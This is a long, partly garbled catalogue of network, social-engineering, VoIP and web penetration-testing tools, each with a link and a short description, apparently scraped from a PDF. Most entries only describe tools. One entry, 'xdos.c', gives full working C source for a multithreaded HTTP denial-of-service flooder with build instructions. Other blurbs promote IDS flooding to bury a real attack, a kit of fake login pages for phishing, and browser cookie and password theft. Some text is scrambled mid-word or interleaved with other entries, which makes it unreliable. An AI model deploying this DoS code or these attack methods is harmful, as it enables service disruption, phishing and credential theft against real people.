hotfuzz http://hotfuzz.atteq.com/ HotFuzzThe HotFuzz project aims at providing a tool for discovering security vul nerabilities in network applications. At the base is the Peach fuzzing framework . To make HotFuzz understand the existing protocols, Wireshark dissectors are us ed. It implements a proxy functionality between network applications. It modifie

s the data before forwarding them to the fuzzed program. By operating as a netwo rk proxy between client and server application and performs real-time data analy sis and fuzzing. We all know that Peach is capable of performing both mutation b ased and generation based fuzzing. Thus, we can safely say that HotFuzz is also capable of the same. Creating a .pit file can be very difficult for inexperienced users. This is wher e HotFuzz comes in handy as it requires very little knowledge about the applicat ion. Infact it is so easy, that it takes the following four steps to fuzz an app lication * * * * Configuration of the applications and the HotFuzz proxy part Recording Configuration of the fuzzing process Fuzzing

hydra http://freeworld.thc.org/thc-hydra/ A very fast network logon cracker which support many different services Number one of the biggest security holes are passwords, as every password securi ty study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast. Currently this tool supports: TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, LDAP2, Cisco AAA (incorporated in telnet module). This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system. hyenae http://sourceforge.net/projects/hyenae/ Hyenae is a highly flexible platform independent network packet generator. It al lows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant. Features * ARP-Request flooding * ARP-Cache poisoning * PPPoE session initiation flooding * Blind PPPoE session termination * ICMP-Echo flooding * ICMP-Smurf attack * ICMP based TCP-Connection reset * TCP-SYN flooding * TCP-Land attack * Blind TCP-Connection reset * UDP flooding * DNS-Query flooding * DHCP-Discover flooding * DHCP starvation attack * DHCP-Release forcing

* * * * *

Cisco HSRP active router hijacking Pattern based packet address configuration Intelligent address and address protocol detection Smart wildcard-based randomization Daemon for setting up remote attack networks

icmpsh https://github.com/inquisb/icmpsh http://bernardodamele.blogspot.com/2011/04/reverse-connection-icmp-shell... A Simple Reverse ICMP Shell! The main advantage over the other open source tools is that it does not require administrative privileges to run onto the target machine. Features * Open source software - primarily coded by Nico, * Client/server architecture. * The master is portable across any platform that on code. * The target system has to be Windows because the ly for now. * The user running the slave on the target system e privileges. inundator http://sourceforge.net/projects/inundator/ IDS/IPS/WAF Evasion & Flooding Tool What is inundator? inundator is a multi-threaded, queue-driven, IDS evasion tool. Its purpose is to anonymously flood intrusion detection systems (specifically Snort) with traffic designed to trigger false positives via a SOCKS proxy in order to obfuscate a r eal attack. When would I use inundator? inundator would be used whenever you feel there is a significant chance the atta ck youre about to perform may be detected by the targets intrusion detection syste m. You would launch inundator prior to starting the attack, and continue running it well after you have finished the attack. The hope is that if your attack is detected by the IDS, the alert will be buried among several thousand false posit ives, thus minimizing the chance of an IDS analyst detecting the real attack. natprobe http://code.google.com/p/natprobe/ This little, but very usefull program, try to sends ICMP packet out the LAN, and detect all the host that allow it. Whit this you can find bugs in your (company ?) network ( or others), for example hosts that allow p2p connections. Explanation When we est mac ferents se from use a Gateway, we send the packets with IP dest of the target, but the d on the ethernet is the mac at the Gateway. If we send a packet to the di macs in the lan, we can know who is the gateway when we recive an respon this mac. forked by me. can run either C, Perl or Pyth slave runs on that platform on does not require administrativ

Some times we can discover more than one box configured to be an gateway, genera lly, this is an wrong configuration, and the box will response with an ICMP-Redi rect. This is the same, becouse the script only verify if the mac response. nbtool http://www.skullsecurity.org/wiki/index.php/Nbtool Some tools for NetBIOS and DNS investigation, attacks, and communication. Features * o * * * * * DNS backdoor (dnscat) v0.04 NetBIOS queries, registrations, and releases (nbquery) NetBIOS sniffing and poisoning (nbsniff) Cross-site scripting over DNS (dnsxss) DNS sniffer (dnslogger) DNS tester (dnstest)

ncat http://nmap.org/ncat/ Ncat is a feature-packed networking utility which reads and writes data across n etworks from the command line. Ncat was written for the Nmap Project as a much-i mproved reimplementation of the venerable Netcat. It uses both TCP and UDP for c ommunication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work w ith IPv4 and IPv6 but provides the user with a virtually limitless number of pot ential uses. nwmap http://sourceforge.net/projects/nwmap/ It is a Perl script which takes a PCAP file as input and identifies valid subnet s in the same. It then assumes a netmask of /24 and searches all those subnets f or live IP's. It then groups all the IP addresses based on the number of hops. ostinato http://code.google.com/p/ostinato/ Ostinato is an open-source, cross-platform network packet crafter/traffic genera tor and analyzer with a friendly GUI. Craft and send packets of several streams with different protocols at different rates. For the full feature list see below . Ostinato aims to be "Wireshark in Reverse" and become complementary to Wireshark . Features * Runs on Windows, Linux, BSD and Mac OS X (Will probably run on other platforms also with little or no modification but this hasn't been tested) * Support for the most common standard protocols o Ethernet/802.3/LLC SNAP o VLAN (with QinQ) o ARP, IPv4, IPv6, IP-in-IP a.k.a IP Tunnelling (6over4, 4over6, 4over4, 6over6) o TCP, UDP, ICMPv4, ICMPv6, IGMP, MLD o Any text based protocol (HTTP, SIP, RTSP, NNTP etc.) o More protocols in the works ...

* Modify any field of any protocol (some protocols allow changing packet fields with every packet at run time e.g. changing IP/MAC addresses) * User provided Hex Dump - specify some or all bytes in a packet * User defined script to substitute for an unimplemented protocol (EXPERIMENTAL) * Stack protocols in any arbitrary order * Create and configure multiple streams * Configure stream rates, bursts, no. of packets * Single client can control and configure multiple ports on multiple computers g enerating traffic * Exclusive control of a port to prevent the OS from sending stray packets provi des a controlled testing environment * Statistics Window shows realtime port receive/transmit statistics and rates * Capture packets and view them (needs Wireshark to view the captured packets) * Framework to add new protocol builders easily pcapdiff http://www.eff.org/testyourisp/pcapdiff Pcapdiff is a tool developed by the EFF to compare two packet captures and ident ify potentially forged, dropped, or mangled packets. Two technically-inclined fr iends can set up packet captures (e.g. tcpdump or Wireshark) on their own comput ers and produce network traffic between their two computers over the Internet. L ater, they can run pcapdiff on the two packet capture files to identify suspicio us packets for further investigation. proxocket http://aluigi.altervista.org/mytoolz.htm#proxocket Luigi Auriemma has built a great tool called Proxocket, which can be used to cap ture calls between an application and the Winsock functions in Windows. Proxocke t is simply two DLL files (ws2_32.dll and wsock32.dll) which should be placed in the same directory as the .exe of the application for which you wanna monitor n etwork traffic. These DLL files act as proxies to the real Winsock DLL files (wi th the same names), which reside in "C:\Windows\System32\". Placing Luigi's prox y DLLs in the same folder as the .exe file causes the application to load the pr oxy DLLs rather than the real Winsock DLLs. Proxocket relays all packets between the application and the real Winsock DLLs, but every relayed packet is also wri tten to a .cap file by Proxocket. Proxocket injects between application and Winsock Not only does Proxocket let you sniff the traffic to and from an application wit hout having to load a new network driver or raw socket sniffing application, it also makes it possible to sniff traffic going to localhost. But why would someon e wanna establish a network connection to localhost, you might ask. I have perso nally used localhost sockets in my applications when I have code running in diff erent processes or threads and need an effective way for them to exchange data i n an asynchronous manner (NetworkMiner does not use localhost sockets for interprocess communication though). I'm actually pretty sure many software developers use localhost sockets when they need to provide data exchange between different processes. Localhost connections are also used when running Stunnel or TOR proxies on your local machine, which encrypt all outgoing traffic. You can thereby use Proxocket in order to capture the network traffic BEFORE it is encrypted by Stunnel or TO R. pwnat http://samy.pl/pwnat/ pwnat, pronounced "poe-nat", is a tool that allows any number of clients behind NATs to communicate with a

server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. The server does not need to know anything about the clients trying to connect. Simply put, this is a proxy server that works behind a NAT, even when the client is behind a NAT, without any 3rd party. There is no middle man, no proxy, no 3rd party, no UPnP/STUN/ICE required, no spoofing, and no DNS tricks. More importantly, the client can then connect to any host or port on any remote host or to a fixed host and port decided by the server. rdp2tcp http://rdp2tcp.sourceforge.net/ http://www.ossir.org/paris/supports/2010/2010-12-14/rdp2tcp.pdf rdp2tcp is a tunneling tool on top of remote desktop protocol (RDP). It uses RDP virtual channel capabilities to multiplex several ports forwarding over an alre ady established rdesktop session. Available features: * * * * tcp port forwarding reverse tcp port forwarding process stdin/out forwarding SOCKS5 minimal support

The code is splitted into 2 parts: * the client running on the rdesktop client side * the server running on the Terminal Server side Once both rdp2tcp client and server are running, tunnels management is performed by the controller (on client side). The controller typically listen on localhos t (port 8477) waiting for new tunnel registrations. tcpjunk http://code.google.com/p/tcpjunk/ Tcpjunk is a general TCP protocols testing and hacking utility. Main features: * * * * * * * Supports IPv4/IPv6 Automatically send/receive data according to predefined session setup Client/Server mode Supports SSL Dynamic data insertion and manipulation using tags Traffic generation GUI mode

udptunnel http://code.google.com/p/udptunnel/ Tunnels TCP over UDP packets. Runs in user space on Linux, Solaris, Cygwin (with IPv6 extension), and native Win32. Currently there isn't any authentication or encryption

xdos.c nil A Simple HTTP DoS Tool! xdos.c $#define WIN32_LEAN_AND_MEAN $#include $#include $#include $unsigned long thread = 0; $static int connect_tv(struct sockaddr_in *addr, int timeout); $static DWORD WINAPI dosmain(LPVOID p); $const int main(int argc, char *argv[]) ${ $ if(argc != 4) { $ puts("\t\t\t\tXDOS - by Bull Moose\n"); $ printf("Usage: %s [IP] [Port] [Threads]\n",argv[0]); $ return 1; $ } $ puts("Initiating xdos...\n"); $ struct sockaddr_in saddr; $ unsigned long tid; $ int i; $ $ memset(&saddr, '', sizeof(saddr)); $ saddr.sin_family = AF_INET; $ saddr.sin_addr.s_addr = inet_addr(argv[1]); $ saddr.sin_port = (short)htons(atoi(argv[2])); $ $ for(i = 1; i <= atoi(argv[3]); i++) CreateThread(0,0,dosmain,(LPVOID)&saddr,0, &tid); $ puts("Attack sequence engaged!\n"); $ dosmain(&saddr); $ return 0; $} $static int connect_tv(struct sockaddr_in *addr, int timeout) ${ $ int s; $ unsigned long i; $ fd_set wr_fds, err_fds; $ struct timeval tv; $ $ s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); $ if (s == 0 || s == INVALID_SOCKET) return 0; $ $ tv.tv_sec = timeout / 1000; $ tv.tv_usec = 0; $ $ i = 1; $ ioctlsocket(s, FIONBIO, &i); $ $ for (;;) { $ i = connect(s, (struct sockaddr *)addr, sizeof(struct sockaddr_in)); $ if (i != SOCKET_ERROR) $ goto exit_connected;

$ i = WSAGetLastError(); $ if (i == WSAENOBUFS) { $ Sleep(50); $ continue; $ } $ if (i == WSAEWOULDBLOCK) $ break; $ goto exit_err; $ } $ $ FD_ZERO(&wr_fds); $ FD_SET(s, &wr_fds); $ FD_ZERO(&err_fds); $ FD_SET(s, &err_fds); $ i = select(s+1, NULL, &wr_fds, &err_fds, &tv); $ $ if (i == 0 || i == -1) $ goto exit_err; $ if (FD_ISSET(s, &err_fds) || !FD_ISSET(s, &wr_fds)) $ goto exit_err; $ $exit_connected: $ i = 0; $ ioctlsocket(s, FIONBIO, &i); $ return s; $ $exit_err: $ closesocket(s); $ return 0; $} $static DWORD WINAPI dosmain(LPVOID p) ${ $ extern unsigned long thread; $ thread++; $ $ printf("Thread number %u initiated!\n",thread); $ struct sockaddr_in addr; $ char Buffer[] = \ $ "GET / HTTP/1.1\r\n" $ "Host: 127.0.0.1\r\n\r\n"; $ SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_BELOW_NORMAL); $ int sock; $ if (p == NULL) goto ex; $ addr = *(struct sockaddr_in *)p; $ for (;;) { $ sock = connect_tv(&addr, 8); $ if (sock != 0) { $ send(sock,Buffer,strlen(Buffer),0); $ Sleep(300); $ closesocket(sock); $ } else if(sock==SOCKET_ERROR) { $ puts("Error: Socket Error.\n"); $ ExitProcess(1); $ } $ } $ex: ExitThread(0); $ return 0; $} $remove all $ befire compile

make.bat @gcc -s -O xdos.c -o xdos.exe -lws2_32 RPSS http://celnet.co.in/tools/Index.php RPSS (REMOTE PENETRATION TESTING SECURITY SHELL)IS THE EXTENSION TOOL OF YOUR SH ELL OR BASH. IT WILL ADD FEW ADITIONAL FUNCTIONALITY BASED ON SECURITY AND PENET RATION TO YOUR COMMAND SHELL. THIS TOOL WILL ACCESS THE INTERNET FROM THE COMMAN D PROMPT. BASICALLY THIS TOOL WORKE AS A BROUSER FROM COMMAND SHELL. IT WILL FAT CH SECURITY RELATED VULNARABLITY AND IT WILL DISPLAY AND STORE ITS OUTPUT IN THE SPECIFIC FILES. THIS IS POWERFUL SECURITY SHELL WHICH CAN BE PENETRATE ANY OF T HE WEB APPLICATION. IF YOU ARE EXPERIENCED HACKER OR PENETRATION TESTER THEN USI NG THIS TOOL YOU CAN MAKE YOUR PENETRATION PROCESS MORE FAST AND EASY. THIS TOOL IS COVERING ALMOST ALL THE HACKING AND PENETRATION TECHNIQUES. BASICALLY IF YOU ARE NEW IN SECURITRY WORLD AND YOU HAVE HARD DUTIES TO PENETRATE MANY WEB APPLI CATION THEN YOU CAN COMPLETE YOUR TASK IN COUPLE OF HOURS USING RPSS. Why RPSS? IF WE TALK TECHNICALLY THEN ENTIRE RPSS PROGRAMING HAS BEEN DONE USING THREAD MA NY THREAD IS BEING CREAT FOR COMPLETE ONE PROCESS. SO THE EXECUTION AND PROCESS TIME OF RPSS IS VERY FAST THEN OTHER TOOLS. THE LOGIC OF EACH TASK IS VERY UNIQU E SO IT WILL WORK AGAINST ANY OF THE TARGET. IT IS NO MATTER THAT TARGET HAS STR ONG FIREWALL, INTRUSION DETECTION SYSTEM, OR AND IP FILTARATION IS INSTALLED. RP SS WILL BY PASS ALL THE SECURITY LAYERS AND IT WILL PROVIDE YOU ACURATE RISULT. YOU CAN USE THIS TOOL FOR DIFFRENT PURPOSE SUCH AS LEGAL PENETRATION TESTING, TE STING YOUR OWN WEBAPPLICATION FOR VULNARABLITIES, FORENSIC INVESTIGATION PURPOSE , TESTING SEUCRITY COMPONENTS ETC... FUNCTION PROXY 1> Getproxy 2> Testproxylist 3> Testproxy 4> Autoproxy 5> Jumping 6> Loadproxy 7> removing 8>Changing FOOT PRINTING 9> ip getting 10> smtp address grabbing 11> tracing the rough 12> identifying technology of server (header information) 13> full server header info gathering 14> crawling emails from search engines (capability to track tricky emails too) 15> website crawling (fussing links of same directory) 16> login page finder (support for asp,aspx,php,cfm,jsp,html,htm with no of payl oads) 17> sub domain enumeration 18>host name qualification from ip range 19> web server service analysis 20> website structure fingerprinting 21> who is look up 22> reversing 23> enumerates server users 24> daemon foot printing 25> operating system foot printing

26> SSLcheck (by this task you can test ssl cipher) 27> DBcheck (by this task you can test database) 28> web server monitoring ANALYSIS 29> getting port information +service info (using thread so very fast) 30> sql injection scan 30.1-> auto scanning url 30.2->auto creating exploitable url 30.3->auto cheacking version 30.4-> auto fuzing table 31> blind injection scan 32>lfi scan 33> rfi scan 34> rce scan 35> xss scan (support HTTPS also) 36> cgi scan (more vuln paths) 37> cms scan (support joomla, membo etc) 38> custom scan 39> full scan BRUTE FORCING 40> bruiting ftp (first will check for anonymous login) 41> bruiting smtp 42> bruiting imap 43> bruiting nntp 44> bruiting pop3 45> bruting RDP 46> Bruting rdp from ip range ENCRYPTION 47> Hashid 48> Onlinehash 49> Autohash 50> Md5 51> Sha1 52> Sha256 53> Sha384 54> Sha512 55> Base64enc 56> Base64dec SUPPORT 57> wordlist builder using custom combination 58> extracting ip addresses from files 59> extracting emails from files 60> crawling words from any of the web which is given by you 61> wget utility SERVER TASK 62> getting port information +service info (using thread so very fast) 63> sql injection scan 63.1-> auto scanning url 63.2->auto creating exploitable url 63.3->auto cheacking version 63.4-> auto fuzing table 64> blind injection scan 65> lfi scan 66> rfi scan 67> rce scan 68> xss scan (support HTTPS also) 69> cgi scan (more vuln paths) 70> cms scan (support joomla, membo etc) 71> custom scan 72> full scan

VERBOUS TASK 73> getting port information +service info (using thread so very fast) 74> sql injection scan 74.1-> auto scanning url 74.2->auto creating exploitable url 74.3->auto cheacking version 74.4-> auto fuzing table 75> blind injection scan 76>lfi scan 77> rfi scan 78> rce scan 79> xss scan (support HTTPS also) 80> cgi scan (more vuln paths) 81> cms scan (support joomla, membo etc) 82> custom scan 83> full scan FORENSIC 84> maleware analysis 85> trojan analysis (very stupid task) 86> exe to batch 87> Fileanalysis 88> Iptrace PENTEST (WORKING ON FEW TASK) 89> Penmysql 90> Penpostgray 91> Penmssql 92> Penoracle 93> Penaccess EXPLOIT (NOT TESTED ALL) 94> Expsearch 95> Milexpgrab 96> Pacexpgrab 97> Mad 98> Boa 99> Buletftp 100> Cesarftp 101> Efs GOOGLE DORK (FEW TASK HAS PROBLEM WORKING ON IT) 102> Dorkscan 103> Subscan 104> Gvscan 105> Shellscan 106> Ranker 107> Usergrab 108> Dorkcreator 109> Cmsscan ROOT (UNDER DEVELOPMENT) 110> Bandtest 111> Flooding 112> Honeypot 113> Chat 114> Games 115> Ids 116> Automachine Social Engineering Imposter http://www.andlabs.org/tools.html

Imposter is a flexible framework to perform Browser Phishing attacks. Once the s ystem running Imposter is configured as the DNS server to the victims, the inter nal DNS server of Imposter resolves all DNS queries to itself. When the victim tries to access any website the domain resolves to the system ru nning Imposter and Imposters internal web server serves content to the victim. De pending on the configuration appropriate payloads are sent to the victim. Data s tolen from the victim is sent back to Imposter and this is stored in a SQLite da tabase in a folder created with its name based on the date and time of the attac k. The lists of attacks performed are: * Steal cookies * Set cookies * Steal Local Shared Objects * Steal stored passwords from FireFox * Steal cached files * Poison browser cache * Steal files from the victims local file system through Internet Explorer * Run SQL queries on the victims Google Gears database and transfer the results * Create ResourceStore and Managed ResourceStore on the victims Google Gears Loca lServer General Requirements: * Administrative Rights: Reasons: o Imposter listens on ports 53/UDP and 80/TCP o The File Stealer module runs an internal sniffer * System running Imposter should have the IP address 192.168.1.3 Reasons: o Internal DNS server resolves all domains to 192.168.1.3 * WinPcap must be installed on the system S-E Ninja http://www.security-database.com/toolswatch/Social-Engineering-Ninja-v0-1-Beta.h tml S-E Ninja is a Social Engineering tool, with 20-25 popular sites fake pages and anonymous mailer via mail() function in PHP. Available Sites: * * * * * * * * * * amazon.com digg.com ebuddy.com facebook.com gmail.com hotmail.com msn.com (hotmail) myspace.com onecard.com (AR,EN Langs) paypal.com

* * * *

travian.com (AR,EN Langs) twitter.com yahoo.com youtube.com

Features: * Fakepages. * IP, malicious page gives you the ip address of victim. * Mailer. You can send an anonymous message using PHP mail() Function /[SENINJA]/admin/mai l and you can get your victim ip put it in the database"/[SENINJA]/ip/" Download from http://brokenpixel.com/images/seninja.zip Social Engineering Toolkit http://www.social-engineer.org/resources/set.html The Social Engineering Toolkit (SET) is a python-driven suite of custom tools whi ch solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tes ter to effectively test how a targeted attack may succeed. VOIP UCSniff http://ucsniff.sourceforge.net/ UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing o pen source software into several useful features, allowing VoIP and IP Video own ers and security professionals to rapidly test for the threat of unauthorized Vo IP and Video Eavesdropping. Written in C/C++, and available on Linux and Windows , the software is free and available for anyone to download, under the GPLv3 lic ense. Some useful features of UCSniff that have been combined together into a si ngle package: Videojak http://videojak.sourceforge.net/ VideoJak is an IP Video security assessment tool that can simulate a proof of co ncept video interception or replay test against a targeted, user-selected video session. VideoJak is the first of its kind security tool that analyzes video cod ec standards such as H.264. VideoJak works by first capturing the RTP port used in a video conversation or stream. Next, VideoJak analyzes the RTP packets, coll ecting the RTP sequence numbers and timestamp values used between the video endp oints. Then VideoJak creates a custom video payload by changing the sequence num bers and timestamp values used in the original RTP packets between the two video endpoints. After the user selects a targeted video device to attack in an ongoi ng video session, VideoJak delivers the payload over the learned RTP port agains t the target. This attack results in one of several new features: Web Andiparos http://code.google.com/p/andiparos/ Andiparos is a fork of the famous Paros Proxy. It is an open source web applicat ion security assessment tool that gives penetration testers the ability to spide r websites, analyze content, intercept and modify requests, etc.

The advantage of Andiparos is mainly the support of Client Certificates on Smart cards. Moreover it has several small interface enhancements, making the life eas ier for penetration testers... Arachni http://github.com/Zapotek/arachni {Arachni} is a feature-full and modular Ruby framework that allows penetration t esters and administrators to evaluate the security of web applications. {Arachni} is smart, it trains itself with every HTTP response it receives during the audit process. Unlike other scanners, Arachni takes into account the dynamic nature of web appl ications and can detect changes caused while travelling through each path of a web application's cyclomatic complexity. This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni. Features of Arachni: * * * * * * * * * * * * * * * * * Provide a stable and efficient framework Be simple Cookie-jar support SSL support. User Agent spoofing. Proxy support for SOCKS and HTTP(S). SOCKS support is kindly provided by socksify. Proxy authentication. Site authentication. Local DNS cache limits name resolution queries. Custom output lib. The system uses its own print wrappers to output messages. Highlighted command line output, Metasploit style. Run mods last option. Allows to run the modules after site analysis has concluded. UI abstraction. Only {Arachni::UI::CLI} for the time being but WebUI & GUI are relatively easy to implement now. * Traps Ctrl-C interrupt. * Interrupts pause the system, the user then has the option to either resume or exit. The Website Crawler included with Arachni has the following features: The crawler is provided by Anemone with some slight modifications to accommodate extra features. * Filters for redundant pages like galleries, catalogs, etc based on regular exp ressions and counters. * URL exclusion filter based on regular expressions. * URL inclusion filter based on regular expressions. * Stays in domain by default and itll probably stay that way. * Can optionally follow subdomains. * Multi-threaded with adjustable thread count. * Adjustable depth limit. * Adjustable link count limit. * Adjustable redirect limit. The HTML Analyzer provided by Arachni provides the following functions:

Can extract and analyze: * Forms * Links * Cookies BlindElephant http://blindelephant.sourceforge.net/ The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations again st precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automat able. BodgeIt Store https://code.google.com/p/bodgeit/ The BodgeIt Store is a vulnerable web application which is currently aimed at pe ople who are new to pen testing. Some of its features and characteristics: * Easy to install - just requires java and a servlet engine, e.g. Tomcat * Self contained (no additional dependencies other than to 2 in the above line) * Easy to change on the fly - all the functionality is implemented in JSPs, so n o IDE required * Cross platform * Open source * No separate db to install and configure - it uses an 'in memory' db that is au tomatically (re)initialized on start up All you need to do is download and open the zip file, and then extract the war f ile into the webapps directory of your favorite servlet engine. Then point your browser at (for example) http://localhost:8080/bodgeit You may find it easier to find vulnerabilities using a pen test tool. If you dont have a favourite one, I'd recommend the Zed Attack Proxy (for which I'm the project lead). The Bodge It Store include the following significant vulnerabilities: * * * * * * * Cross Site Scripting SQL injection Hidden (but unprotected) content Cross Site Request Forgery Debug code Insecure Object References Application logic vulnerabilities

Browser Fuzzer http://www.krakowlabs.com/dev.html Browser Fuzzer 3 is designed as a hybrid framework/standalone fuzzer; the module s it uses are extendable but also highly integrated into the core. bf3 can be us ed via command line to set all necessary flags for each fuzzing operation. After initialization, bf3 creates test cases in a numbered system. Fuzzing is automat ed through the browser using the refresh method. If error is detected, server lo

gs can provide insight to the offending test case. Features Fuzzes CSS, DOM, HTML, JavaScript and XML Attended and Unattended Fuzzing Modes 7th Generation Fuzzing Oracle Random Data Generator Mutation Fuzzing Engine

Browser Rider http://www.engineeringforfun.com/ BrowserRider is a framework built to exploit the cross site scripting vulnerabil ity. Its purpose is to prove the impact of this vulnerability during a vulnerabi lity assessment. Burp Suite http://portswigger.net/suite/ Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilit ate and speed up the process of attacking an application. All tools share the sa me robust framework for handling HTTP requests, persistence, authentication, ups tream proxies, logging, alerting and extensibility. Burp Suite allows you to combine manual and automated techniques to enumerate, a nalyse, scan, attack and exploit web applications. The various Burp tools work t ogether effectively to share information and allow findings identified within on e tool to form the basis of an attack using another. Key features unique to Burp Suite include: * Detailed analysis and rendering of requests and responses. * One-click transfer of interesting requests between tools. * Site map showing information accumulated about target applications in tree and table form. * Ability to "passively" spider an application in a non-intrusive manner, with a ll requests originating from the user's browser. * Suite-level target scope configuration, driving numerous individual tool actio ns. * Fully fledged web vulnerability scanner. [Pro version only] * Ability to save and restore state. [Pro version only] * FIPS-compliant statistical analysis of session token randomness. * Utilities for decoding and comparing application data. * A range of engagement tools, to make your work faster and more effective. [Pro version only] * Suite-wide search function. [Pro version only] * Support for custom client and server SSL certificates. * Extensibility via the IBurpExtender interface. * Centrally configured settings for upstream proxies, web and proxy authenticati on, and logging. * Tools can run in a single tabbed window, or be detached in individual windows. * Runs in both Linux and Windows. CAT http://www.contextis.co.uk/resources/tools/cat/ CAT is designed to facilitate manual web application penetration testing for mor e complex, demanding application testing tasks. It removes some of the more repe

titive elements of the testing process, allowing the tester to focus on individu al applications, thus enabling them to conduct a much more thorough test. Concep tually it is similar to other proxies available both commercially and open sourc e, but CAT provides a richer feature set and greater performance, combined with a more intuitive user interface. There are a number of differences between CAT and currently available web proxie s. They include: CAT uses Internet Explorers rendering engine for accurate HTML representation It supports many different types of text conversions including: URL, Base64, Hex , Unicode, HTML/XML, SQL and JavaScript no quotes It offers integrated SQL Injection and XSS Detection Synchronised Proxies for Authentication and Authorisation checking Faster performance due to HTTP connection caching SSL Version and Cipher checker using OpenSSL Greater flexibility for importing/exporting logs and saving projects Tabbed Interface allows for multiple tools at once e.g. multiple repeaters & dif ferent logs The ability to repeat and modify a sequence of requests (particularly useful in SSO testing) Its free! Cewl http://www.digininja.org/projects/cewl.php CeWL (Custom Word List generator) is a ruby app which spiders a given url to a s pecified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL is p ronounced "cool". ClickjackingTool http://www.contextis.co.uk/resources/tools/clickjacking-tool/ Clickjacking Tool Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen i n 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible i frame. Although it has been two years since the concept was first introduced, most webs ites still have not implemented effective protection against clickjacking. In pa rt, this may be because of the difficulty of visualising how the technique works in practice. This new browser-based tool allows a user to experiment with clickjacking techni ques by using point-and-click to visually select different elements within a web page to be targeted. The tool also allows several 'next-generation' clickjacking techniques to be used, as introduced in Paul Stone's Blackhat Europe 2010 talk. Among the features of the new tool are: * Use point-and-click to select the areas of a page to be targeted * Supports the new 'text-field injection' technique * Supports the new 'content extraction' technique * 'Visible mode' replay allowing a user to see how the technique works behind th e science * 'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.

The tool is currently in an early beta stage, and works best in Firefox 3.6. Ful l support for other browsers will follow shortly. For further information, pleas e see the Readme.txt file in the downloadable tool. Darkjumper http://sourceforge.net/projects/darkjumper/ Darkjumper.py Developed by : mywisdom & gunslinger_ This tool will try to find every website that host at the same server at your ta rget Then check for every vulnerability of each website that host at the same se rver Functions of darkjumper: 1. User enumeration guessing based on 4-8 chars trial taken from every site name that host at the same server. 2. Scan for sql injection,local file inclusion,remote file inclusion and blind s ql injection on every site at the same server. 3. CGI and Path Scanning. 4. Port-scanning 5. Auto-bruteforcing after user enumeration 6. Auto-injector auto column finder (mysql) if found mysql bug found 7. Proxy added 8. Verbocity added 9. IP or proxy checker and GeoIP useful for checking your IP or your proxy work or not. DotDotPwn http://dotdotpwn.blogspot.com/ A simple perl tool which detects several Directory Traversal Vulnerabilities on HTTP/FTP Servers. This AttackDB version currently has: 871 traversal payloads (a nd counting!). http://chr1x.sectester.net/toolz/ddpwn/ * Detects Directory traversal vulnerabilities on remote HTTP/FTP server systems. * Currently, the traversal database holds 881 attack payloads. Use the -update f lag to perform an online fresh update. * DotDotPwn checks the presence of boot.ini on the vulnerable systems through Di rectory traversal vulnerabilities, so it's assumed that the tested systems are Windows based HTTP/FTP servers. Firesheep http://codebutler.github.com/firesheep/ Firefox extension that demonstrates HTTP session hijacking attacks When logging into a website you usually start by submitting your username and pa ssword. The server then checks to see if an account matching this information ex ists and if so, replies back to you with a "cookie" which is used by your browse r for all subsequent requests. It's extremely common for websites to protect your password by encrypting the in itial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (someti mes called "sidejacking") is when an attacker gets a hold of a user's cookie, al lowing them to do anything the user can do on a particular website. On an open w ireless network, cookies are basically shouted through the air, making these att acks extremely easy.

Firesheep is free, open source, and is available now for Mac OS X and Windows. L inux support is on the way. Websites have a responsibility to protect the people who depend on their service s. They've been ignoring this responsibility for too long, and it's time for eve ryone to demand a more secure web. My hope is that Firesheep will help the users win. Groundspeed http://groundspeed.wobot.org/ Groundspeed is an open-source Firefox extension for web application security tes ters presented at the OWASP AppSec DC 2009. It allows you to manipulate the web applications user interface to eliminate annoying limitations and client-side con trols that interfere with the web application penetration test. Hamster http://hamster.erratasec.com/ Hamster is a tool for HTTP session hijacking with passive sniffing. It does so, by sniffing on a network, capturing the session cookies, importing them into the browser to allow you to hijack their session! HTTP session hijacking or SideJac king is where you hijack a existing Web session with a remote service by interce pting and using the credentials (normally session cookies) that identified the u ser to that specific server. JBroFuzz http://sourceforge.net/projects/jbrofuzz/files/ JBroFuzz is a web application fuzzer for requests being made over HTTP and/or HT TPS. Its purpose is to provide a single, portable application that offers stable web protocol fuzzing capabilities. Release Notes (2.3): Multiple instances can now save data in different launch directories, under: Pre ferences -> Directory Locations Keep History of previous dir in: File -> Save, File -> Open, File -> Save As Fixed find functionality when viewing fuzzing responses (thx Markus!) Added a swap button, in the Encoder Window, plus friends Encoder/Hash is now also a standalone jar/exe file Added right click encode/decode functionality in the Fuzzer tab - Request Text P anel Added a standalone jbrofuzz-core-2.3.jar fuzzing API library Release Notes (2.1): - Ctrl + M to load your own fuzzers from a .jbrf file - Removed the default addition of line feeds at the end of each request, make su re you know what you are fuzzing! - On The Wire: Right-click, clear & also option to select to see requests and/or responses - Added ASCII 85 (045-A85-RFC) & printable ASCII 94 (046-A94-CHR) fuzzers. - Base32 and zBase32 Encode/Decode functionality added - JBroFuzz now logs into daily log (thnx Ranulf!) - You can load your custom 